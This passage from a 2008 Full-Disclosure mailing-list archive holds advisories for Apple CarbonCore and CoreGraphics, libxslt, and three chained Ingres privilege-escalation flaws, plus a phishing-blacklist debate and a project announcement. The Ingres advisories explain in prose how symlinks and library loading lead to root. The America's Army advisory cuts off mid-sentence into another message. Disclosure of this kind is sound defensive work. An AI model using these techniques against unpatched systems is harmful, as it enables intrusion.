vulnerability. n.runs AG illustrated the exploitation using Safari and Mail - both present on a standard OS X installation - to demonstrate the risks. The attack surface is however not limited to these two applications: any software component that makes use of the CarbonCore framework may allow arbitrary code execution. The vulnerability is present in Apple CarbonCore Framework prior to the update released on Aug 1st, 2008. Solution: The vulnerability was reported on Apr 1st, 2008 and Apple Security Update has been issued to solve this vulnerability on Aug 1st, 2008. For detailed information about the fixes, follow the link in the references section [1] of this document. ________________________________________________________________________ Credits: Bug found by Sergio ?shadown? Alvarez of n.runs AG. ________________________________________________________________________ References: [1] http://support.apple.com/kb/HT2647 This Advisory and Upcoming Advisories: http://www.nruns.com/security_advisory.php Subscribe to the n.runs newsletter by signing up to: http://www.nruns.com/newsletter_en.php ________________________________________________________________________ Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact security at nruns.com for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Copyright 2008 n.runs AG. All rights reserved. Terms of use apply. From labs-no-reply at idefense.com Fri Aug 1 19:06:47 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Fri, 01 Aug 2008 14:06:47 -0400 Subject: [Full-disclosure] iDefense Security Advisory 07.31.08: Apple Mac OS X CoreGraphics PDF Type1 Font Integer Overflow Vulnerability Message-ID: <489350B7.7080704@idefense.com> iDefense Security Advisory 07.31.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jul 31, 2008 I. BACKGROUND Mac OS X is a Unix operating system built from the XNU kernel. Mac OS X provides all the standard Unix capabilities and tools with an additional GUI component. For more information, see the vendor's site found at the following link URL. http://www.apple.com/macosx/ II. DESCRIPTION Remote exploitation of an integer overflow vulnerability in Apple Inc.'s Mac OS X could allow an attacker to execute arbitrary code with the privileges of the currently logged in user. This vulnerability exists due to the way PDF files containing Type 1 fonts are handled. When processing a font with an overly large length, integer overflow could occur. This issue leads to heap corruption which can allow for arbitrary code execution. III. ANALYSIS Exploitation of this issue allows an attacker to execute arbitrary code. An attacker could exploit this issue via multiple attack vectors. The most appealing vector for attack is Safari. An attacker could host a malformed PDF file on a website and entice a targeted user to open a URL. Upon opening the URL in Safari the PDF file will be automatically parsed and exploitation will occur. While this is the most appealing attack vector, the file can also be attached to an e-mail. Any application which uses the Apple libraries for file open dialogs will crash upon previewing the malformed PDF document. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Mac OS X version 10.5.2. Previous versions may also be affected. V. WORKAROUND iDefense is currently unaware of any workarounds for this issue. VI. VENDOR RESPONSE Apple addressed this vulnerability within their Mac OS X 2008-005 security update. More information is available at the following URL. http://support.apple.com/kb/HT2647 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-2322 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 07/09/2008 Initial vendor notification 07/10/2008 Initial vendor response 07/31/2008 Public disclosure IX. CREDIT This vulnerability was reported to iDefense by Pariente Kobi. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From xploitable at gmail.com Fri Aug 1 19:14:37 2008 From: xploitable at gmail.com (n3td3v) Date: Fri, 1 Aug 2008 19:14:37 +0100 Subject: [Full-disclosure] Fwd: Black Hat talk on Apple encryption cancelled In-Reply-To: <1463f4c30808011113y2fe962e4x13e03cefc135da54@mail.gmail.com> References: <1463f4c30808011113y2fe962e4x13e03cefc135da54@mail.gmail.com> Message-ID: <4b6ee9310808011114i1cb6e9efs9a1427bce4b8ca6@mail.gmail.com> ---------- Forwarded message ---------- From: newsgroup Date: Fri, Aug 1, 2008 at 7:13 PM Subject: Black Hat talk on Apple encryption cancelled To: n3td3v at googlegroups.com Just days before the annual Black Hat security conference in Las Vegas, a talk on Apple's FileVault encryption system was abruptly canceled by its presenter. Researcher Charles Edge told the Washington Post that he had signed confidentiality agreements with Apple. The agreements prevent him from discussing further any vulnerabilities he may have found within Apple's FileVault encryption system. Edge, Director of Technology of 318, Inc, has spoken at previous Black Hat and DefCon conferences. This is not the first time a vendor has asked a security research not to give at talk at Black Hat. In 2005, then-ISS employed researcher Micheal Lynn, was asked by Cisco not to present a talk on flaws within that company's routers. On stage at Black Hat, Lynn first quit his job, then went ahead and gave his original talk. Afterward, he, too, signed a confidentiality agreement with Cisco. http://news.cnet.com/8301-1009_3-10004627-83.html From security at mandriva.com Fri Aug 1 21:48:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Fri, 01 Aug 2008 14:48:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:160 ] libxslt Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:160 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libxslt Date : August 1, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 4.0 _______________________________________________________________________ Problem Description: Chris Evans of the Google Security Team found a vulnerability in the RC4 processing code in libxslt that did not properly handle corrupted key information. A remote attacker able to make an application linked against libxslt process malicious XML input could cause the application to crash or possibly execute arbitrary code with the privileges of the application in question (CVE-2008-2935). The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2935 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: 9582b6a5a85d8a4fde0be6113565cd9d 2007.1/i586/libxslt1-1.1.20-2.2mdv2007.1.i586.rpm 5205ec749db53b73cbec782d507686df 2007.1/i586/libxslt1-devel-1.1.20-2.2mdv2007.1.i586.rpm 64a810f8ac91b49c80c38e33f2750f85 2007.1/i586/libxslt-proc-1.1.20-2.2mdv2007.1.i586.rpm bb9f876808ec910122977f7166112245 2007.1/i586/python-libxslt-1.1.20-2.2mdv2007.1.i586.rpm fa2168576c9baedb55b2577f913fbdec 2007.1/SRPMS/libxslt-1.1.20-2.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 1bd1a4df038c3c4a5b753537854afd17 2007.1/x86_64/lib64xslt1-1.1.20-2.2mdv2007.1.x86_64.rpm aaecaefb1c25c1838199058ffbec4bf9 2007.1/x86_64/lib64xslt1-devel-1.1.20-2.2mdv2007.1.x86_64.rpm e39afe30c9f38113fde7e1fd060de05b 2007.1/x86_64/libxslt-proc-1.1.20-2.2mdv2007.1.x86_64.rpm dfa8806c560c888f225b557622f3e10c 2007.1/x86_64/python-libxslt-1.1.20-2.2mdv2007.1.x86_64.rpm fa2168576c9baedb55b2577f913fbdec 2007.1/SRPMS/libxslt-1.1.20-2.2mdv2007.1.src.rpm Mandriva Linux 2008.0: 01d8d7608c3c74e8aa862f79907e07cc 2008.0/i586/libxslt1-1.1.22-2.2mdv2008.0.i586.rpm 4da832fd851d55b48b80341d7c3bc4ee 2008.0/i586/libxslt-devel-1.1.22-2.2mdv2008.0.i586.rpm 58e5f582472d1e28dce386c2bd5d9de4 2008.0/i586/libxslt-proc-1.1.22-2.2mdv2008.0.i586.rpm 74141e240b0e2a3b19790cb9addc0151 2008.0/i586/python-libxslt-1.1.22-2.2mdv2008.0.i586.rpm 85c0d64608fb55944316a2ac46096d13 2008.0/SRPMS/libxslt-1.1.22-2.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 7ff6d48c755e2907846f9a6b6378b5b9 2008.0/x86_64/lib64xslt1-1.1.22-2.2mdv2008.0.x86_64.rpm f026cc563722e6847d58b0e1e6f0f6ce 2008.0/x86_64/lib64xslt-devel-1.1.22-2.2mdv2008.0.x86_64.rpm bc530cb61a211a50155c59c52de543c3 2008.0/x86_64/libxslt-proc-1.1.22-2.2mdv2008.0.x86_64.rpm 458c1d9d588b4a3a435eb26dcf23e2f5 2008.0/x86_64/python-libxslt-1.1.22-2.2mdv2008.0.x86_64.rpm 85c0d64608fb55944316a2ac46096d13 2008.0/SRPMS/libxslt-1.1.22-2.2mdv2008.0.src.rpm Mandriva Linux 2008.1: c8cab87e462864b9d575613630500965 2008.1/i586/libxslt1-1.1.22-2.2mdv2008.1.i586.rpm 2fb2120f868e093a73c766537eca4c4c 2008.1/i586/libxslt-devel-1.1.22-2.2mdv2008.1.i586.rpm c9322ae81ff3e2bcbadef36a1d3f29ec 2008.1/i586/libxslt-proc-1.1.22-2.2mdv2008.1.i586.rpm fa11c933fa71ffe7dffd869454809523 2008.1/i586/python-libxslt-1.1.22-2.2mdv2008.1.i586.rpm 126fa9767b486afdddd09ead4b9f5841 2008.1/SRPMS/libxslt-1.1.22-2.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: d7eeca6bfa273ff8d3995144272825e8 2008.1/x86_64/lib64xslt1-1.1.22-2.2mdv2008.1.x86_64.rpm cf74a4e8440e324e776d00162784da57 2008.1/x86_64/lib64xslt-devel-1.1.22-2.2mdv2008.1.x86_64.rpm b6ff1bbf9fc5c56421b4cd2c60515c21 2008.1/x86_64/libxslt-proc-1.1.22-2.2mdv2008.1.x86_64.rpm 9507d84c1b2338ac8a06a76efd9cd94d 2008.1/x86_64/python-libxslt-1.1.22-2.2mdv2008.1.x86_64.rpm 126fa9767b486afdddd09ead4b9f5841 2008.1/SRPMS/libxslt-1.1.22-2.2mdv2008.1.src.rpm Corporate 4.0: 6fddddda1818a68ea24d52e6e181f095 corporate/4.0/i586/libxslt1-1.1.15-1.2.20060mlcs4.i586.rpm 1679fdbdfb7020be4622fae157a2a2b5 corporate/4.0/i586/libxslt1-devel-1.1.15-1.2.20060mlcs4.i586.rpm 3a030cdd0fbadaf26b4871d371fe6f54 corporate/4.0/i586/libxslt-proc-1.1.15-1.2.20060mlcs4.i586.rpm ecaa9e0beff76328b236a87870274b1d corporate/4.0/i586/libxslt-python-1.1.15-1.2.20060mlcs4.i586.rpm bf4154eaf3cff4b487a71c9f9edcb60c corporate/4.0/SRPMS/libxslt-1.1.15-1.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 953ce3b7b6f9f5be7c2a24d2aef92bbe corporate/4.0/x86_64/lib64xslt1-1.1.15-1.2.20060mlcs4.x86_64.rpm 4ae0c85ebc4d13552b6db13a2067dea4 corporate/4.0/x86_64/lib64xslt1-devel-1.1.15-1.2.20060mlcs4.x86_64.rpm 65d3b3a21d5165b0eb256db4c57d946d corporate/4.0/x86_64/libxslt-proc-1.1.15-1.2.20060mlcs4.x86_64.rpm 645272c4f3c51b3e28a19ff14be17a36 corporate/4.0/x86_64/libxslt-python-1.1.15-1.2.20060mlcs4.x86_64.rpm bf4154eaf3cff4b487a71c9f9edcb60c corporate/4.0/SRPMS/libxslt-1.1.15-1.2.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIk0h+mqjQ0CJFipgRAh4bAJ0ZFnPrAmi0ZCs+VmIS3FNbrVq6BQCgmZDa daQ2pWT0o/xjJuwNSVBtcSI= =YYmK -----END PGP SIGNATURE----- From labs-no-reply at idefense.com Sat Aug 2 05:28:45 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Sat, 02 Aug 2008 00:28:45 -0400 Subject: [Full-disclosure] iDefense Security Advisory 08.01.08: Ingres Database for Linux verifydb Insecure File Permissions Modification Vulnerability Message-ID: <4893E27D.4040707@idefense.com> iDefense Security Advisory 08.01.08 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 01, 2008 I. BACKGROUND Ingres Database is a database server used in several Computer Associates' products. For example, CA Directory Service uses the Ingres Database server. More information can be found on the vendor's website at the following URL. http://ingres.com/downloads/prod-cert-download.php II. DESCRIPTION Local exploitation of a file permissions modification vulnerability in the "verifydb" utility, as included with Ingres Database 2006 Release 2 for Linux, allows attackers to modify the permissions of files owned by the Ingres database user. The vulnerability exists within the "verifydb" utility included with Ingres. It is used to cleanup unneeded files created in the database directory. This program has the set-uid bit set, and is owned by the "ingres" user. The "verifydb" program improperly changes the permissions on files. The program first creates a file called "iivdb.log" in the current directory, and then makes it world writable. By creating a symbolic link to a file owned by the "ingres" user, an attacker can gain write access to the target file. III. ANALYSIS Exploitation of this vulnerability allows an attacker to overwrite arbitrary files owned by the "ingres" user. By itself, this vulnerability does not have very serious consequences. However, when combined with the library loading vulnerability, it allows an attacker to execute arbitrary code with root privileges. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Ingres 2006 Enterprise Edition Release 2 for Linux x86 (32-bit). Other versions may also be affected. V. WORKAROUND iDefense is currently unaware of any workaround for this issue. VI. VENDOR RESPONSE "This problem has been identified and resolved by Ingres in the following releases: Ingres 2006 release 2 (9.1.0), Ingres 2006 release 1 (9.0.4), and Ingres 2.6." For more information, refer to Ingres' advisory at the following URL. http://www.ingres.com/support/security-alert-080108.php VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3356 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 07/20/2007 Initial vendor response 07/23/2007 Initial vendor notification 08/01/2008 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Sat Aug 2 05:29:53 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Sat, 02 Aug 2008 00:29:53 -0400 Subject: [Full-disclosure] iDefense Security Advisory 08.01.08: Ingres Database for Linux libbecompat Stack Based Buffer Overflow Vulnerability Message-ID: <4893E2C1.7090705@idefense.com> iDefense Security Advisory 08.01.08 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 01, 2008 I. BACKGROUND Ingres Database is a database server used in several Computer Associates' products. For example, CA Directory Service use thes Ingres Database server. More information can be found on the vendor's website at the following URL. http://ingres.com/downloads/prod-cert-download.php II. DESCRIPTION Local exploitation of a stack-based buffer overflow vulnerability in the "libbecompat" library, as included in Ingres Database 2006 Release 2 for Linux, allows attackers to execute arbitrary code with the privileges of the Ingres user. The vulnerability exists within the "libbecompat" library that is used by several of the set-uid "ingres" utilities included with Ingres. When copying a user supplied environment variable into a fixed-size stack buffer, the library fails to check the length of the source string. This results in an exploitable stack buffer overflow. III. ANALYSIS Exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the "ingres" user. By itself, this vulnerability does not have very serious consequences. However, when combined with the library loading vulnerability, it allows an attacker to execute arbitrary code with root privileges. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Ingres 2006 Enterprise Edition Release 2 for Linux x86 (32-bit). Other versions may also be affected. V. WORKAROUND iDefense is currently unaware of any workaround for this issue. VI. VENDOR RESPONSE "This problem has been identified and resolved by Ingres in the following releases: Ingres 2006 release 2 (9.1.0), Ingres 2006 release 1 (9.0.4), and Ingres 2.6." For more information, refer to Ingres' advisory at the following URL. http://www.ingres.com/support/security-alert-080108.php VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3389 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 07/20/2007 Initial vendor response 07/23/2007 Initial vendor notification 08/01/2008 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Sat Aug 2 05:30:27 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Sat, 02 Aug 2008 00:30:27 -0400 Subject: [Full-disclosure] iDefense Security Advisory 08.01.08: Ingres Database for Linux ingvalidpw Untrusted Library Path Vulnerability Message-ID: <4893E2E3.8060401@idefense.com> iDefense Security Advisory 08.01.08 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 01, 2008 I. BACKGROUND Ingres Database is a database server used in several Computer Associates' products. For example, CA Directory Service use thes Ingres Database server. More information can be found on the vendor's website at the following URL. http://ingres.com/downloads/prod-cert-download.php II. DESCRIPTION Local exploitation of an untrusted library path vulnerability in the "ingvalidpw" utility, as included in Ingres Database 2006 Release 2 for Linux, allows attackers to execute arbitrary code with root privileges. The vulnerability exists within the "ingvalidpw" utility included with Ingres database. This utility is used to verify a user's credentials, and is installed set-uid root. When loading shared libraries, the "ingvalidpw" program will load libraries from a directory owned by the "ingres" user. By using a specially crafted library, a user with "ingres" privileges can gain root. III. ANALYSIS Exploitation of this vulnerability allows an attacker to elevate their privileges from the "ingres" user to root. By itself, this is not that serious of a vulnerability. However, when combined with the libbecompat and verifydb vulnerabilities it allows an unprivileged local user to gain root privileges. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Ingres 2006 Enterprise Edition Release 2 for Linux x86 (32-bit). Other versions may also be affected. V. WORKAROUND iDefense is currently unaware of any workarounds for this issue. VI. VENDOR RESPONSE "This problem has been identified and resolved by Ingres in the following releases: Ingres 2006 release 2 (9.1.0), Ingres 2006 release 1 (9.0.4), and Ingres 2.6." For more information, refer to Ingres' advisory at the following URL. http://www.ingres.com/support/security-alert-080108.php VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3357 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 07/20/2007 Initial vendor response 07/23/2007 Initial vendor notification 08/01/2008 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From aluigi at autistici.org Sat Aug 2 19:15:17 2008 From: aluigi at autistici.org (Luigi Auriemma) Date: Sat, 2 Aug 2008 19:15:17 +0100 Subject: [Full-disclosure] Server termination in America's Army 2.8.3.1 Message-ID: <20080802191517.7829c548.aluigi@autistici.org> ####################################################################### Luigi Auriemma Applications: America's Army http://www.americasarmy.com Versions: <= 2.8.3.1 Platforms: Windows (tested), Linux and Mac Bug: server termination due to failed assertion Exploitation: remote, versus server Date: 02 Aug 2008 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== >From Wikipedia: "America's Army (also known as AA or Army Game Project) is a tactical multiplayer first-person shooter owned by the United States Government and released as a global public relations initiative to help with U.S. Army recruitment." ####################################################################### ====== 2) Bug ====== The AA server can be terminated remotely through a specific single spoofable UDP packet which leads to a failed assertion: "Assertion failed: VoiceIndex Hi, My name is Andrea Di Pasquale and I study at Secondary High School "S. Quasimodo" in Catania, Italy. Some time ago I released a research project related to the security of the address resolution protocol Arp, the project name being Arpon (Arp handler inspection). Arpon makes the protocol secure without recurring to algorythms, SSL or any other technology which is not part of the standard protocol. Arpon is a daemon based on the Arp handling mechanism in kernel space that uses different policies either in static environments (Static Arp Inspection algorythm), or in DHCP dynamic ones (Dynamic Arp Inspection algorythm). Arpon is written as a user space tool so it can work on posix platforms: infact it is extensively tested on platform such as Max OS X, FreeBSD, OpenBSD, NetBSD and Linux. Today I suggest you to have a look at the project, because I think it has great potentiality, the only competitor on the market being Cisco's DAI on Catalyst 4500 devices (which uses DHCP to securify ARP; Arpon just uses the standard kspace protocol implementation instead). Furthermore, Arpon is Open Source software. Links: http://arpon.sourceforge.net/ http://arpon.sourceforge.net/documentation.html http://arpon.svn.sourceforge.net/viewvc/arpon/ Thanks for the attention, I hope in your interest. Cordially, Andrea. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080803/b95b902d/attachment.html From stuart at cyberdelix.net Sun Aug 3 03:05:14 2008 From: stuart at cyberdelix.net (lsi) Date: Sun, 03 Aug 2008 03:05:14 +0100 Subject: [Full-disclosure] simple phishing fix In-Reply-To: <4890DCD1.25286.1B878EF@nick.virus-l.demon.co.uk> References: , <48903106.2932.25DFF97E@stuart.cyberdelix.net> , <4890DCD1.25286.1B878EF@nick.virus-l.demon.co.uk> Message-ID: <4895206A.3270.3926E595@stuart.cyberdelix.net> To cut to the chase, approx 80% of all phish target 1 of 20 or less companies. [1] [2] [7] [8] [9] I also found a paper which suggests the blacklist might work. [6] I found three other papers that reviewed phish detection in-depth, however none of them seemed to mention filtering on the FROM field. [4] [5] [10] I also detail a fix for unblocked senders (eg. to selectively allow mail from spoofed domains, such as Paypal), see below. Nick says the blacklist won't stop phishing, per se, because phishers will begin to target unlisted companies. While I agree that phishers will begin to target unlisted companies, it does not follow that phishing will continue to be profitable. It MAY still be profitable to be a phisher in these circumstances. What will definitely be true is that such a blacklist will make phishing less profitable, this being because the total amount of funds available to phish has been substantially reduced, while at the same time, locating new victims is more difficult. What will also be true is the list will stop phish from listed companies from clogging mail systems, particularly as most users never have any need to receive mail from those companies. I accept that the blacklist MAY NOT make phishing unprofitable, and the blacklist WILL NOT stop phish from unlisted companies. So, the list WILL reduce junk and WILL hit phishers in the back pocket. And this is a bad idea? Assumptions: 1. the phisher does NOT know which bank his potential victims use 2. the phisher is seeking to maximise revenue, and minimise costs 3. creating the fake mail and site is time-consuming ------- likely factors affecting phishing profitability: Here's a description of the phishing business model, there's no reference cos I made it up. As you can see there's a few more costs than actually spamming out the phish, which I agree may be without cost. total cost = time + money to create the fake mail PLUS time + money to create the fake web site PLUS time + money to obtain hosting for the fake web site PLUS time + money to obtain/maintain/rent the botnet used to send the fake mail PLUS time + money to launder the cash PLUS time + money on personal security total revenue = total number of mails sent MINUS mails blocked - bad recipient address MINUS mails blocked - filtered (anti-spam/phish filter etc) MINUS mails deleted - end-user not a customer of target institution MINUS mails deleted - end-user not fooled MINUS mails deleted - end-user not interested MINUS mails deleted - technical issue MULTIPLY average profit per successful phish Most articles on phishing describe how the fake mail and fake website are "carefully" designed, and "carefully" selected recipient lists are used. Careful means slow, AFAIK. The more careful you are, the more successful your phish, BUT the longer it takes you to make, the more money you need to make to break even. So the rational phisher will find a balance there. The point is, the rational phisher will not bang out a new site every five minutes. The site needs to be convincing, the email needs to be convincing, and being convincing takes time. I might be wrong. The kits Nick mentioned might make it all easy. But Nick also mentions that those kits are backdoored. So I think that means the rational phisher is going to have to make his own pages from scratch. And that is gonna take time. Time = money. If the phisher makes $20/hr from phishing, but he could be making $50/hr spamming, it's costing him $30/hr to be a phisher. The rational phisher would cease phishing in these circumstances. -------- statistics showing that blocking the top 20 brands will have a big impact: "..These brands exhibited Pareto-type properties in that a small number of brands accounts for a large number of actual phishing sites." [9] Approx 80% of all phish target 1 of 20 or less companies. [1] [2] [7] [8] [9] If those companies were widely blacklisted, 80% of all phish/phishers would need to make new phishing sites, and find new victims. Note that 20 is a very small number and a blacklist of this size, including variants, is manageable. Note that although 20 is a very small number, it covers all of the most-profitable-to-phish companies currently being phished (assuming that profitability-to-phish is proportionate to total phishing attempts, this may be wrong, but if it is wrong, some phishers are wasting their time). Although the top 20 account for 80% of total phish, blacklisting mail from those companies will not stop 80% of phish, because phishers will presumably move on to target companies that are not blacklisted. However, those companies are less profitable for phishers - if they were more profitable, then those companies would be in the top 80% already. There are many reasons why they might be less profitable: - ease of execution - size of customerbase - total funds available - additional benefits or penalties The blacklist would make phishing less profitable because it forces less-profitable companies to be targetted. When an unlisted company is targetted, it is added to the list. Eventually, all high-profit companies will be listed. Nick suggests that the phishers will just send more emails, I suggest this will just get them detected, blocked, and taken down faster. Nick seems to be suggesting that phishers will always be able to make a healthy profit by targetting small institutions. This might continue to be true if: - costs to phishers are small, and remain so - revenue is decent, and remains so However various technologies are working to push costs up and revenue down, this is going to continue. Phishers, OTOH cannot do much more than they are already doing to maximise their revenues, that means as anti-phishing technology evolves, phishing profits are going to fall. How much they fall depends on the tech. There is a definite possibility that some/all phishers will not be able to cover their costs. Certainly, anti-phishing technologies should seek to maximise this possibility. The harder phishing is, the less profitable it becomes. Nick mentioned an infinite set of domainnames, I believe at that time he was confused between the domainname stated in the FROM field (which is what I am focusing on) and domainnames listed in the bodytext (I'm ignoring those). The set of domainnames in the from field is very small, 714 items in total [2], most of which have only been phished a few times. I agree the set of domainnames in the bodytext is infinite. It seems to me that the FROM field is the most obvious sign of a phish. If the mail is FROM a company I don't do business with, of course it's a phish, no need for any further testing. But I don't need to list every company I don't do business with, I only need to list every company I don't do business with *that phishes me*. This list is currently very small, as the referenced statistics show. --------- ease of use by end-users: I agree end-users can't be relied on. The way it could work, say with a webmail service, is that the webmail service has a page, "my phishing preferences", on there is a list of blocked-by-default companies (the blacklist). The user scrolls down to the company they want to unblock and unchecks the "blocked" box. Then they click Save. For corporate environments, a similar function could be performed by the IT dept as part of their usual antispam/antivirus routine. All users are blocked by default from receiving all mail from any blacklisted company. To receive mail from a blacklisted company, fill in a form on the intranet and await a response in email from the IT dept. The IT dept does their magic using procmail or similar. For end-users with POP3 clients the blacklist would ideally be a installation component, packaged with the binary, the user would go to Tools.. Options.. Phishing Preferences. The default setting for each company listed is "blocked". The user scrolls down to the company they want to unblock and unchecks the "blocked" box. Then they click Save. If an updated blacklist was deployed, users would want to see the list of new blocked companies, in case they were corresponding with them previously. I agree that a list with hundreds of thousands of institutions on it would not be workable. However the statistics show that currently, this is not required. [1] [2] [7] [8] [9] --------- how to secure "unblocked" companies: So above I went through a few ways in which users could unblock companies they want to receive mail from, it's obviously a vulnerability when they do this, but it can be fixed, Paypal's strategy is to include a pre-shared secret in the bodytext of the mail. This requires two filtering rules, the second conditional on a match on the first. This is not a problem for some mail clients such as Pegasus Mail but may be a problem for lesser-evolved beasts such as Outlook. This same technique (the pre-shared secret) could be used by any targetted company that sends emails to customers, all that is needed is that the filter knows the secret, and takes that into account when filtering. Ideally, what would happen is that when the user unblocks a company, they are prompted for the pre-shared secret. Missing secret = unable to unblock. The filtering rules ideally would then be autoconfigured in the correct way by the software/IT dept. -------- variations/obfuscation/armouring: There is very little evidence, in the databases I checked [1] [2], of the use of variations such as wachov1a, although added spaces, missing hyphens and so on does happen. Obfuscation/armouring is a common spam tactic, but phish are seeking to be as legitimate as possible, and any kind of obfuscation reduces total revenue. This is a distinguishing feature between phish and spam, and it permits the possibility that techniques that don't work against spam, such as a blacklist, might be successfully used against phish. If the variations get excessive, I suggest regular expressions. Again, not a problem for some mail clients, but other software such as Thunderbird does not support them (last I checked). It is *hoped* that the power of regex's will be enough - there is a limit on how much obfuscation can be used, as it potentially alerts the user to the phish. Time will tell. --------- this idea elsewhere on the net: Three academic papers [4] [5] [10] review the literature concerning phish detection in detail, however none of them list analysis of the FROM field of the mail. That is, they don't even list it and dismiss it, because of x, y and z, the technique is simply not mentioned. One paper [6] notes that the FROM field "likely matches legitimate mail from [the targetted company]"; later it says "domain blacklisting can be used effectively to flag and drop messages". --------- references: [1] shows that the top 10 targetted companies account for 12166 of 16527 phish (73%) http://www.phishtank.com/stats/2008/04/ [2] shows a total of 714 targetted companies - with some duplication - most with one 1 or 2 phishing attempts http://www.millersmiles.co.uk/scams.php [3] gives an estimate of average profit per successful phish = USD 1224: http://www.markmonitor.com/download/wp/wp-whofights.pdf [4] "Behind Phishing: An Examination of Phisher Modi Operandi" (contains a useful literature review) 